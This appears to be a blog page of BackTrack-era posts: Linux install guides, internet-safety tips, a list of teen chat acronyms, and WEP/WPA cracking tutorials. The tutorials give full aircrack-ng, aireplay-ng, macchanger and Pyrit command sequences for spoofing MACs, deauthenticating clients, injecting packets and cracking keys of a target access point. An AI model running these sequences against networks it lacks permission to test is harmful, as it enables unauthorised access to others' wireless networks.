Aircrack-ng Linux WEP wifi WPA

Aircrack-ng – WEP and WPA-PSK keys cracking program

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. Aircrack-ng is a set of tools for auditing wireless networks – not for WiFi hacking.  Make sure you use this on your own network or one where you have permission to test.

Aircrack-ng is the next generation of aircrack with lots of new features:

BackTrack Linux Ubuntu VMWare WEP WPA

Shutdown Command for BackTrack 3 or 4

Since BackTrack is built on Linux you can shutdown BackTrack from the shell using poweroff or restart it with reboot.

BackTrack links

BackTrack BackTrack 4 Beta BT BT4 HD HDD Linux Ubuntu VMWare WEP Windows WPA

BackTrack 4 PreRelease Hard Disk Install

Since BackTrack 4 Pre-Release does not contain an installer you can follow these steps to install BT4 quickly and easily. The assumption is that you are installing BT4 on an empty disk (/dev/sda in this tutorial).

Boot to BT4 DVD (download BackTrack 4 ISO – make sure to get the BT 4 Beta and not the BT4 Pre Release). Enter commands in bold.

1. Start by creating 3 partitions on the disk, one each for boot, swap and root. Note, since your disk size is probably different than mine the number of cylinders will likely be different.

root@bt:~# fdisk /dev/sda

The number of cylinders for this disk is set to 19457.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs

Command (m for help): n
Command action
e extended
p primary partition (1-4)
Partition number (1-4): 1
First cylinder (1-19457, default 1): <enter>
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-19457, default 19457): +128M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
Partition number (1-4): 2
First cylinder (18-19457, default 18): <enter>
Using default value 18
Last cylinder, +cylinders or +size{K,M,G} (18-19457, default 19457): +1024M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
Partition number (1-4): 3
First cylinder (150-19457, default 150): <enter>
Using default value 150
Last cylinder, +cylinders or +size{K,M,G} (150-19457, default 19457): +16000M

Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 82
Changed system type of partition 2 to 82 (Linux swap / Solaris)

Command (m for help): a
Partition number (1-4): 1

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.

2. Format the file systems, mount them and copy over the directory structure. Chroot into new environment.

root@bt:~# mke2fs /dev/sda1
root@bt:~# mkswap /dev/sda2
root@bt:~# swapon /dev/sda2
root@bt:~# mkreiserfs /dev/sda3
root@bt:~# mkdir /mnt/bt
root@bt:~# mount /dev/sda3 /mnt/bt/
root@bt:~# mkdir /mnt/bt/boot
root@bt:~# mount /dev/sda1 /mnt/bt/boot
root@bt:~# cp –preserve -R /{bin,dev,home,pentest,root,usr,boot,etc,lib,opt,sbin,var} /mnt/bt/
root@bt:~# mkdir /mnt/bt/{mnt,tmp,proc,sys}
root@bt:~# chmod 1777 /mnt/bt/tmp/
root@bt:~# mount -t proc proc /mnt/bt/proc
root@bt:~# mount -o bind /dev /mnt/bt/dev/
root@bt:~# chroot /mnt/bt/ /bin/bash

3. Configure /etc/lilo.conf to reflect your setup.


# bitmap=/boot/sarge.bmp
# bmp-colors=1,,0,2,,0
# bmp-table=120p,173p,1,15,17
# bmp-timer=254p,432p,1,0,0
# install=bmp

# delay=20


# map=/boot/map



4. Fix first line in /etc/fstab, and remove unnecessary mount lines. Add the swap partition to the fstab so it gets loaded at boot time. Your fstab should look similar to this:

/dev/sda3 / reiserfs defaults 0 0 # AutoUpdate
/dev/sda2 none swap sw 0 0
proc /proc proc defaults 0 0 # AutoUpdate
sysfs /sys sysfs defaults 0 0 # AutoUpdate
devpts /dev/pts devpts gid=5,mode=620 0 0 # AutoUpdate
tmpfs /dev/shm tmpfs defaults 0 0 # AutoUpdate

5. Execute lilo and reboot!

root@bt:/# lilo -v
LILO version 22.8, Copyright (C) 1992-1998 Werner Almesberger
Development beyond version 21 Copyright (C) 1999-2006 John Coffman
Released 19-Feb-2007, and compiled at 14:08:06 on May 15 2008

Reading boot sector from /dev/sda
Using MENU secondary loader
Calling map_insert_data

Boot image: /boot/vmlinuz
Mapping RAM disk /boot/splash.initrd
Added BT4 *

Writing boot sector.
Backup copy of boot sector in /boot/boot.0800
root@bt:/# exit
root@bt:~# reboot

BackTrack links

Aircrack-ng aireplay airmon airodump BackTrack BT crack Encryption hack howto Linux Passwords Ubuntu Video VMWare WEP wifi Windows wireless WPA

HowTo: Crack WPA with Backtrack 3

This is an easy to follow tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes.


  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)
BackTrack links

Aircrack-ng aireplay airmon airodump BackTrack BT crack Encryption hack howto Linux Passwords Ubuntu Video VMWare WEP wifi Windows wireless WPA

HowTo: Crack WEP with BackTrack 3

This is a tutorial on how to crack a wep encrypted password. This information should only be used for education purposes.


  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
  8. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  9. aircrack-ng -b (bssid) (filename-01.cap)
BackTrack links

crack hack Linux Passwords Security Windows wireless WPA

Wireless WPA/WPA2-PSK GPU Cracking with Pyrit – How to Use Pyrit in BackTrack

Pyrit is a GPU cracker for attacking WPA/WPA2 PSK protocols. It allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff.  Pyrit works with many platforms including CUDA, ATI-Stream, OpenCL and VIA Padlock.

How to
Listing available cores

pyrit list_cores

Determining performance of cores

pyrit benchmark

Create a new ESSID

pyrit -e Linksys create_essid

Import list of passwords

pyrit -f dict.txt import_passwords

 Start Batch Processing

pyrit batch

Cracking WPA/WPA2-PSK using pyrit/coWPAtty

pyrit -e “Linksys” -f dict.txt passthrough | cowpatty -d – -r wpa2handshake.cap -s “Linksys“
“-e” ESSID for the command
“-f” Filename for the command (’-’ is stdin/stdout)
“-d” Hash file
“-” Accept words on stdin
“-r” Packet capture file
“-s” Network SSID

BackTrack BT BT 4 Linux Passwords Security Ubuntu VMWare WEP Windows WPA

How To Install Backtrack4 Using Grub On Ubuntu

Backtrack is an operating system that is specially designed for networking security. Bactrack OS is based on Linux. As of this writing the latest version of Bactrack is Backtrack4 with many, many useful applications. Before installing BT4, make sure you have installed Ubuntu on your computer so we can use Ubuntu’s Grub for booting.

Follow these steps to install and configure dual booting Ubuntu / Backtrack4.

  1. Prepare your PC
    Ubuntu OS installed on sda2
    BT4 will install on sda3
  2. Run BT4 using LiveCD
    user : root
    password : toor
  3. Installation process

    # mkfs.ext3 /dev/sda3

    # mkdir /mnt/BT4
    # mkdir /mnt/ubuntu
    # mount /dev/sda3 /mnt/BT4
    # mount /dev/sda2 /mnt/ubuntu
    # mkdir /mnt/BT4/boot

    # cp /boot/vmlinuz /mnt/BT4/boot
    # cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/BT4/
    # mkdir /mnt/BT4/{mnt,proc,sys,tmp}
    # mount --bind /dev/ /mnt/BT4/dev/
    # mount -t proc proc /mnt/BT4/proc/

  4. Edit Grub of Ubuntu
    # vi /mnt/ubuntu/boot/grub/menu.lst

    #you must insert this at bottom page:
    title Backtrack4
    rootnoverify (hd0,2)
    kernel /boot/vmlinuz vga=791 root=/dev/sda3 ro autoexec=xconf;kdm

  5. Exit and restart your PC. Select “Backtrack4” and login.
  6. Registering sda3 to fstab
    We must register /dev/sda2 and /dev/sda3 so either Ubuntu or BT4 can be booted.

    # mkdir /mnt/BT4
    # mkdir /mnt/ubuntu
    # vi /etc/fstab

    /dev/sda2 /mnt/ubuntu ext3
    /dev/sda3 /mnt/BT4 ext3

Aircrack-ng aireplay airmon airodump BackTrack iwconfig kismet Linux macchanger Security WEP wifi WPA

Cracking WEP Using Backtrack: Beginner’s Guide

This tutorial is intended for user’s with little or no experience with Linux or wifi. BackTrack, from remote-exploit is a tool which makes it very easy to access any network secured by WEP encryption. This tutorial aims to guide you through the process of using it effectively.

Required Tools

  • You will need a computer with a wireless adapter listed here
  • Download BackTrack (4 Pre Release is the most recent as of this writing) and burn the ISO to a CD


BackTrack is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.

Tools Overview

  • Kismet – a wireless network detector and packet sniffer
  • airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
  • airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
  • aireplay – a tool for forging ARP requests
  • aircrack – a tool for decrypting WEP keys
  • iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
  • macchanger – a tool that allows you to view and/or spoof (fake) your MAC address

Glossary of Terms

  • AP: Access Point: a wireless router
  • MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
  • BSSID: Access Point’s MAC address
  • ESSID: Access Point’s Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name but Kismet may be able to detect it anyway
  • TERMINAL: Command line interface. You can open this by clicking the black box icon next to the start key in BackTrack.
  • WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks.
  • WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption

Since BackTrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a Linux partition on your hard drive or a USB storage device. BackTrack has some NTFS support so you will be able to browse to your Windows based hard drive should you have one, but it will mount the partition as “read-only”.  To find your hard drive or USB storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.


Hacking into someone’s wireless network without permission is probably against the law. Make sure you are using this to test your own system(s) or one that you have explicit permission to “test.”



Monitoring Wireless Traffic With Kismet

Place the BackTrack CD into your cd-rom drive and boot into BackTrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like “Hit ctrl+esc to change bios settings”. Changing your first boot device to cdrom will do the trick. Once booted into Linux, login as root with username: root password: toor. These are the default username and password used by BackTrack. A command prompt will appear. Type startx to start KDE (a ‘Windows’ like workspace for Linux).

Once KDE is up and running start kismet by clicking on the start key and browsing to BackTrack->Wireless Tools -> Analyzers ->Kismet. Alternatively you can open a Terminal and type:


Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely ‘ath0′, and sit back as kismet starts detecting networks in range.

NOTE: We are using kismet for two reasons:

  1. To find the bssid, essid, and channel number of the AP you are accessing.
  2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device’s name just type:


Which will look something like this:

While kismet detects networks and various clients accessing those networks you might want to type ’s’ and then ‘Q’ (case sensitive). This sorts all of the AP’s in your area by their signal strength. The default ‘autofit’ mode that kismet starts up in doesn’t allow you much flexibility. By sorting AP’s by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (side note: when selecting target AP keep in mind this tutorial only covers accessing host AP’s that use WEP encryption. In kismet the flags for encryption are Y/N/0. Y=WEP N=Open Network- no encryption 0= other: WPA most likely.) Further reading on Kismet is available here.

Select the AP (access point) you want to access. Copy and paste the broadcast name (essid), MAC address (bssid), and channel number of your target AP into a text editor. BackTrack is KDE based so you can use kwrite. Just open a terminal and type in ‘kwrite’ or select it from the start button. In BackTrack’s terminal to copy and paste you use shift+ctrl+c and shift+control+v respectively. Leave kismet running to leave your wireless adapter in monitor mode. You can also use airmon to do this manually. airmon-ng -h for help.


Collecting Data With Airodump

Open a new terminal and start airodump to collect ARP replies from the target AP. Airodump is fairly straight forward, but for help you can type “airodump-ng -h” at the command prompt for additional options.

airodump-ng ath0 -w /mnt/hda2/home/admin/ap_dump 6 1

Breaking down this command:

  • ath0 is my wireless card
  • -w tells airodump to write the file to
  • 6 is the channel 6 of my target AP
  • 1 tells airodump to only collect IVS – the data packets with the WEP key


Associate your wireless card with the AP you are accessing.

aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:11:22:AA:BB:CC ath0

  • -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing aireplay-ng -h
  • 0 specifies the delay between attacks
  • -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
  • -a is the bssid tag (MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
  • ath0 at the end is my wireless adapters device name in Linux


Start packet injection with aireplay

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:11:22:AA:BB:CC ath0


  • -b requires the MAC address of the AP we are accessing.
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
  • if packets are being collected at a slow pace you can type iwconfig ath0 rate auto to adjust your wireless adapter’s transmission rate. You can find your AP’s transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.

As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren’t many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.

If you get a message like this:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Just reassociate with the AP following the instructions on step 3.


Decrypting the WEP Key with Aircrack

Find the location of the captured IVS file you specified in step 2. Then type in a terminal:

aircrack-ng -s /mnt/hda2/home/ap_dump.ivs

Change /mnt/hda2/home/ap_dump.ivs to your file’s location.  Once you have enough captured data packets decrypting the key will only take a couple of seconds. If aircrack doesn’t find a key almost immediately, just sit back and wait for more data packets.

For more information or assistance you can access the BackTrack forums at

Anti-Spyware Encryption Firewall Internet Linux Passwords Security Spyware SSL Virus Scan WEP wifi Windows Windows Update WPA

Internet Safety: How to keep your computer safe on the Internet

Here are some things you can, and should, do to stay safe.

  • Stay Up-To-Date – Most virus infections don’t have to happen. Software vulnerabilities that the viruses exploit usually already have patches available by the time the virus reaches a computer. The problem? The user simply failed to install the latest patches and updates that would have prevented the infection in the first place. The solution is simple: enable automatic updates, and visit Windows Update periodically. Keeping Windows and other software up-to-date is the most important (and easiest) thing you can do to protect your computer.
  • Get Educated – To be blunt, all the protection in the world won’t save you from yourself. Don’t open attachments that you aren’t positive are okay. Don’t fall for phishing scams. Don’t click on links in email that you aren’t positive are safe. Don’t install “free” software without checking it out first – many “free” packages are free because they come loaded with spyware, adware and worse. When visiting a web site, did you get a pop-up asking if it’s ok to install some software you’re not sure of because you’ve never heard of it? Don’t say “OK”. Not sure about some security warning you’ve been given? Don’t ignore it. Choose strong passwords, and don’t share them with others.
  • Use a Firewall – A firewall is a piece of software or hardware that sits between your computer and the Internet and only allows certain types of traffic to crossl. For example, a firewall may allow checking email and browsing the web, but disallow things that are commonly not as useful such as RPC or “Remote Procedure Calls”.
  • Virus Scan – Sometimes, typically via email, virii are able to cross the firewall and get to your computer anyway. A virus scanner will locate and remove them from your hard disk. A real time virus scanner will notice them as they arrive, even before they hit the disk, but at the cost of slowing down your machine a little. Important: because new virii are arriving every day, it’s important to keep your virus definitions up-to-date. Be sure to enable the scanning software’s automatic-update feature and have it do so every day.
  • Kill Spyware – Spyware is similar to virii in that they arrive unexpected and unannounced and proceed to do something undesired. Normally spyware is relatively benign from a safety perspective, but it can violate your privacy by tracking the web sites you visit, or add “features” to your system that you didn’t ask for. The worst offenders are spyware that hijack normal functions for themselves. For example, some like to redirect your web searches to other sites to try and sell you something. Of course some spyware is so poorly written that it might as well be a virus, given how unstable it can make your system. The good news is that, like virus scanners, there are spyware scanners that will locate and remove the offending software. 
  • Secure Your Mobile Connection – if you’re traveling and using internet hot spots, free Wifi or internet cafes, you must take extra precautions. Make sure that your web email access is via secure (https) connections, or that your regular mail is over an encrypted connection as well. Don’t let people “shoulder surf” and steal your password by watching you type it in a public place. Make sure your home Wifi has WEP or, preferably WPA security enabled if anyone can drive or walk within range.
  • Don’t forget the physical – an old computer adage is that “if it’s not physically secure, it’s not secure.” All of the precautions I’ve listed above are pointless if other people can get at your computer. They may not follow the safety rules I’ve laid out. A thief can easily get at all the unencrypted data on your computer if they can physically get to it. The common scenario is a laptop being stolen, but there are many reports of people who’ve been burned because a family member or roommate accessed their computer without their knowledge. 

It all might seem overwhelming, but it’s not nearly as overwhelming as an actual security problem if and when it happens to you. While we might want it to be otherwise, the practical reality of the internet, and computing today, is that we each must take responsibility for our own security online.

chat IM Internet Linux SMS teen text message Windows Windows 2000 WPA

Top 50 Internet Acronyms Parents Need to Know

Parents, do you know what your kids (teen and pre-teen) are saying when they chat? Here are 50 text/SMS/Internet acronyms/shortcuts parents need to know.

Goto our complete list of Internet/Chat acronyms (nearly 2000).

8 Oral sex
1337 Elite -or- leet -or- L337
143 I love you
182 I hate you
1174 Nude club
420 Marijuana
459 I love you
ADR Address
AEAP As Early As Possible
ALAP As Late As Possible
ASL Age/Sex/Location
CD9 Code 9 – it means parents are around
C-P Sleepy
F2F Face-to-Face
GNOC Get Naked On Cam
GYPO Get Your Pants Off
HAK Hugs And Kisses
ILU I Love You
IWSN I Want Sex Now
J/O Jerking Off
KOTL Kiss On The Lips
KFY -or- K4Y Kiss For You
KPC Keeping Parents Clueless
LMIRL Let’s Meet In Real Life
MOOS Member Of The Opposite Sex
MOSS Member(s) Of The Same Sex
MorF Male or Female
MOS Mom Over Shoulder
MPFB My Personal F*** Buddy
NALOPKT Not A Lot Of People Know That
NIFOC Nude In Front Of The Computer
NMU Not Much, You?
P911 Parent Alert
PAL Parents Are Listening
PAW Parents Are Watching
PIR Parent In Room
POS Parent Over Shoulder -or- Piece Of Sh**
pron porn
Q2C Quick To Cum
RU/18 Are You Over 18?
RUMORF Are You Male OR Female?
RUH Are You Horny?
S2R Send To Receive
SorG Straight or Gay
TDTM Talk Dirty To Me
WTF What The F***
WUF Where You From
WYCM Will You Call Me?
WYRN What’s Your Real Name?
zerg To gang up on someone